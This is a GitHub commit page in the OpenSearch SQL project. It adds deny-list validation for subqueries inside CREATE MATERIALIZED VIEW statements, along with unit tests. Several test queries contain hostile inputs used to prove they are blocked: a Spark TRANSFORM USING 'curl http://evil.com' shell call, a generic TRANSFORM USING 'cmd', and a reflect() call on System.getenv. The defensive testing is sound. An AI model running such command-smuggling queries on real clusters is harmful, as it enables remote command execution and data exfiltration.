Skip to content

Commit 024238d

Browse files
committed
Validate Flint extension query subqueries against grammar deny list
Implement validateFlintExtensionQuery() to extract and validate the inner SQL subquery from CREATE MATERIALIZED VIEW statements. Previously, this method was a no-op, meaning MV subqueries were not checked against the grammar element deny list.

Also adds tumble and hop to the DATE_TIMESTAMP function type to align with Spark's classification of time windowing functions.

Signed-off-by: Jialiang Liang <jiallian@amazon.com>
1 parent d099d3e commit 024238d

4 files changed

Lines changed: 186 additions & 5 deletions

File tree

async-query-core/src/main/java/org/opensearch/sql/spark/validator/FunctionType.java

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -184,6 +184,7 @@ public enum FunctionType {
184184
"from_unixtime",
185185
"from_utc_timestamp",
186186
"hour",
187+
"hop",
187188
"last_day",
188189
"localtimestamp",
189190
"make_date",
@@ -211,6 +212,7 @@ public enum FunctionType {
211212
"to_unix_timestamp",
212213
"to_utc_timestamp",
213214
"trunc",
215+
"tumble",
214216
"try_to_timestamp",
215217
"unix_date",
216218
"unix_micros",

async-query-core/src/main/java/org/opensearch/sql/spark/validator/SQLQueryValidator.java

Lines changed: 11 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -9,6 +9,7 @@
99
import org.apache.logging.log4j.LogManager;
1010
import org.apache.logging.log4j.Logger;
1111
import org.opensearch.sql.datasource.model.DataSourceType;
12+
import org.opensearch.sql.spark.dispatcher.model.IndexQueryDetails;
1213
import org.opensearch.sql.spark.utils.SQLQueryUtils;
1314

1415
/** Validate input SQL query based on the DataSourceType. */
@@ -38,10 +39,18 @@ public void validate(String sqlQuery, DataSourceType datasourceType) {
3839
}
3940

4041
/**
41-
* Validates a query from the Flint extension grammar. The method is currently a no-op.
42+
* Validates a Flint extension query by extracting and validating any embedded SQL subquery. For
43+
* CREATE MATERIALIZED VIEW statements, the inner query is validated against the same deny list
44+
* used for standard SQL queries.
4245
*
4346
* @param sqlQuery The Flint extension query to be validated
4447
* @param dataSourceType The type of the datasource the query is being run on
4548
*/
46-
public void validateFlintExtensionQuery(String sqlQuery, DataSourceType dataSourceType) {}
49+
public void validateFlintExtensionQuery(String sqlQuery, DataSourceType dataSourceType) {
50+
IndexQueryDetails indexQueryDetails = SQLQueryUtils.extractIndexDetails(sqlQuery);
51+
String mvQuery = indexQueryDetails.getMvQuery();
52+
if (mvQuery != null) {
53+
validate(mvQuery, dataSourceType);
54+
}
55+
}
4756
}

async-query-core/src/test/java/org/opensearch/sql/spark/dispatcher/SparkQueryDispatcherTest.java

Lines changed: 71 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -501,6 +501,77 @@ void testDispatchShowMVQuery() {
501501
testDispatchBatchQuery("SHOW MATERIALIZED VIEW IN mys3.default");
502502
}
503503

504+
@Test
505+
void testDispatchMVWithWindowFunctionAllowed() {
506+
when(emrServerlessClientFactory.getClient(any())).thenReturn(emrServerlessClient);
507+
when(queryIdProvider.getQueryId(any(), any())).thenReturn(QUERY_ID);
508+
when(emrServerlessClient.startJobRun(any())).thenReturn(EMR_JOB_ID);
509+
DataSourceMetadata dataSourceMetadata = constructMyGlueDataSourceMetadata();
510+
when(dataSourceService.verifyDataSourceAccessAndGetRawMetadata(
511+
MY_GLUE, asyncQueryRequestContext))
512+
.thenReturn(dataSourceMetadata);
513+
514+
String query =
515+
"CREATE MATERIALIZED VIEW my_glue.default.mv_window AS"
516+
+ " SELECT window.start AS `start.time`, COUNT(*) AS count"
517+
+ " FROM my_glue.default.http_logs WHERE status != 200"
518+
+ " GROUP BY window(`@timestamp`, '1 Minutes')"
519+
+ " WITH (auto_refresh = true, refresh_interval = '1 Minutes',"
520+
+ " checkpoint_location = 's3://bucket/checkpoint',"
521+
+ " watermark_delay = '10 Minutes')";
522+
523+
DispatchQueryResponse response =
524+
sparkQueryDispatcher.dispatch(getBaseDispatchQueryRequest(query), asyncQueryRequestContext);
525+
verify(emrServerlessClient, times(1)).startJobRun(any());
526+
assertEquals(EMR_JOB_ID, response.getJobId());
527+
}
528+
529+
@Test
530+
void testDispatchMVWithTumbleFunctionAllowed() {
531+
when(emrServerlessClientFactory.getClient(any())).thenReturn(emrServerlessClient);
532+
when(queryIdProvider.getQueryId(any(), any())).thenReturn(QUERY_ID);
533+
when(emrServerlessClient.startJobRun(any())).thenReturn(EMR_JOB_ID);
534+
DataSourceMetadata dataSourceMetadata = constructMyGlueDataSourceMetadata();
535+
when(dataSourceService.verifyDataSourceAccessAndGetRawMetadata(
536+
MY_GLUE, asyncQueryRequestContext))
537+
.thenReturn(dataSourceMetadata);
538+
539+
String query =
540+
"CREATE MATERIALIZED VIEW my_glue.default.mv_tumble AS"
541+
+ " SELECT window.start AS `start.time`, COUNT(*) AS count"
542+
+ " FROM my_glue.default.http_logs WHERE status != 200"
543+
+ " GROUP BY TUMBLE(`@timestamp`, '6 Hours')"
544+
+ " WITH (auto_refresh = false)";
545+
546+
DispatchQueryResponse response =
547+
sparkQueryDispatcher.dispatch(getBaseDispatchQueryRequest(query), asyncQueryRequestContext);
548+
verify(emrServerlessClient, times(1)).startJobRun(any());
549+
assertEquals(EMR_JOB_ID, response.getJobId());
550+
}
551+
552+
@Test
553+
void testDispatchMVWithTransformBlocked() {
554+
DataSourceMetadata dataSourceMetadata = constructMyGlueDataSourceMetadata();
555+
when(dataSourceService.verifyDataSourceAccessAndGetRawMetadata(
556+
MY_GLUE, asyncQueryRequestContext))
557+
.thenReturn(dataSourceMetadata);
558+
559+
String query =
560+
"CREATE MATERIALIZED VIEW my_glue.default.mv_exploit AS"
561+
+ " SELECT TRANSFORM(status) USING 'curl http://evil.com' AS x"
562+
+ " FROM my_glue.default.http_logs"
563+
+ " WITH (auto_refresh = false)";
564+
565+
IllegalArgumentException exception =
566+
Assertions.assertThrows(
567+
IllegalArgumentException.class,
568+
() ->
569+
sparkQueryDispatcher.dispatch(
570+
getBaseDispatchQueryRequest(query), asyncQueryRequestContext));
571+
Assertions.assertTrue(exception.getMessage().contains("TRANSFORM is not allowed"));
572+
verifyNoInteractions(emrServerlessClient);
573+
}
574+
504575
@Test
505576
void testRefreshIndexQuery() {
506577
when(emrServerlessClientFactory.getClient(any())).thenReturn(emrServerlessClient);

async-query-core/src/test/java/org/opensearch/sql/spark/validator/SQLQueryValidatorTest.java

Lines changed: 102 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -12,7 +12,6 @@
1212
import static org.mockito.Mockito.when;
1313

1414
import java.util.Arrays;
15-
import java.util.UUID;
1615
import lombok.AllArgsConstructor;
1716
import lombok.Getter;
1817
import org.antlr.v4.runtime.CommonTokenStream;
@@ -577,11 +576,111 @@ void testSecurityLakeQueries() {
577576
}
578577

579578
@Test
580-
void testValidateFlintExtensionQuery() {
579+
void testValidateFlintExtensionQuery_safeQuery() {
580+
when(mockedProvider.getValidatorForDatasource(any()))
581+
.thenReturn(new S3GlueSQLGrammarElementValidator());
582+
assertDoesNotThrow(
583+
() ->
584+
sqlQueryValidator.validateFlintExtensionQuery(
585+
"CREATE MATERIALIZED VIEW mv AS select * from table WITH (auto_refresh = false)",
586+
DataSourceType.S3GLUE));
587+
}
588+
589+
@Test
590+
void testValidateFlintExtensionQuery_blocksTransformInMV() {
591+
when(mockedProvider.getValidatorForDatasource(any()))
592+
.thenReturn(new S3GlueSQLGrammarElementValidator());
593+
assertThrows(
594+
IllegalArgumentException.class,
595+
() ->
596+
sqlQueryValidator.validateFlintExtensionQuery(
597+
"CREATE MATERIALIZED VIEW mv AS SELECT TRANSFORM(id) USING 'cmd' AS x FROM tbl"
598+
+ " WITH (auto_refresh = false)",
599+
DataSourceType.S3GLUE));
600+
}
601+
602+
@Test
603+
void testValidateFlintExtensionQuery_blocksReflectInMV() {
604+
when(mockedProvider.getValidatorForDatasource(any()))
605+
.thenReturn(new S3GlueSQLGrammarElementValidator());
606+
assertThrows(
607+
IllegalArgumentException.class,
608+
() ->
609+
sqlQueryValidator.validateFlintExtensionQuery(
610+
"CREATE MATERIALIZED VIEW mv AS SELECT reflect('java.lang.System', 'getenv',"
611+
+ " 'PATH') FROM tbl WITH (auto_refresh = false)",
612+
DataSourceType.S3GLUE));
613+
}
614+
615+
@Test
616+
void testValidateFlintExtensionQuery_nonMVStatementsPass() {
617+
assertDoesNotThrow(
618+
() ->
619+
sqlQueryValidator.validateFlintExtensionQuery(
620+
"DROP MATERIALIZED VIEW mv", DataSourceType.S3GLUE));
621+
assertDoesNotThrow(
622+
() ->
623+
sqlQueryValidator.validateFlintExtensionQuery(
624+
"REFRESH MATERIALIZED VIEW mv", DataSourceType.S3GLUE));
625+
assertDoesNotThrow(
626+
() ->
627+
sqlQueryValidator.validateFlintExtensionQuery(
628+
"CREATE SKIPPING INDEX ON tbl (col VALUE_SET)", DataSourceType.S3GLUE));
629+
}
630+
631+
@Test
632+
void testValidateFlintExtensionQuery_mvWithWindowFunction() {
633+
when(mockedProvider.getValidatorForDatasource(any()))
634+
.thenReturn(new S3GlueSQLGrammarElementValidator());
635+
assertDoesNotThrow(
636+
() ->
637+
sqlQueryValidator.validateFlintExtensionQuery(
638+
"CREATE MATERIALIZED VIEW ds.default.mv AS SELECT window.start AS `start.time`,"
639+
+ " COUNT(*) AS count FROM ds.default.http_logs WHERE status != 200"
640+
+ " GROUP BY window(`@timestamp`, '1 Minutes')"
641+
+ " WITH (auto_refresh = true, refresh_interval = '1 Minutes',"
642+
+ " checkpoint_location = 's3://bucket/checkpoint',"
643+
+ " watermark_delay = '10 Minutes')",
644+
DataSourceType.S3GLUE));
645+
}
646+
647+
@Test
648+
void testValidateFlintExtensionQuery_mvWithTumbleFunction() {
649+
when(mockedProvider.getValidatorForDatasource(any()))
650+
.thenReturn(new S3GlueSQLGrammarElementValidator());
651+
assertDoesNotThrow(
652+
() ->
653+
sqlQueryValidator.validateFlintExtensionQuery(
654+
"CREATE MATERIALIZED VIEW ds.default.mv AS SELECT window.start AS `start.time`,"
655+
+ " COUNT(*) AS count FROM ds.default.http_logs WHERE status != 200"
656+
+ " GROUP BY TUMBLE(`@timestamp`, '6 Hours')"
657+
+ " WITH (auto_refresh = false)",
658+
DataSourceType.S3GLUE));
659+
}
660+
661+
@Test
662+
void testValidateFlintExtensionQuery_mvWithHopFunction() {
663+
when(mockedProvider.getValidatorForDatasource(any()))
664+
.thenReturn(new S3GlueSQLGrammarElementValidator());
665+
assertDoesNotThrow(
666+
() ->
667+
sqlQueryValidator.validateFlintExtensionQuery(
668+
"CREATE MATERIALIZED VIEW ds.default.mv AS SELECT window.start AS `start.time`,"
669+
+ " COUNT(*) AS count FROM ds.default.http_logs"
670+
+ " GROUP BY HOP(`@timestamp`, '5 Minutes', '10 Minutes')"
671+
+ " WITH (auto_refresh = false)",
672+
DataSourceType.S3GLUE));
673+
}
674+
675+
@Test
676+
void testValidateFlintExtensionQuery_coveringIndexPass() {
581677
assertDoesNotThrow(
582678
() ->
583679
sqlQueryValidator.validateFlintExtensionQuery(
584-
UUID.randomUUID().toString(), DataSourceType.SECURITY_LAKE));
680+
"CREATE INDEX idx ON ds.default.http_logs (status, day, clientip)"
681+
+ " WITH (auto_refresh = true, refresh_interval = '5 minute',"
682+
+ " checkpoint_location = 's3://bucket/checkpoint')",
683+
DataSourceType.S3GLUE));
585684
}
586685

587686
@Test

0 commit comments

Comments
 (0)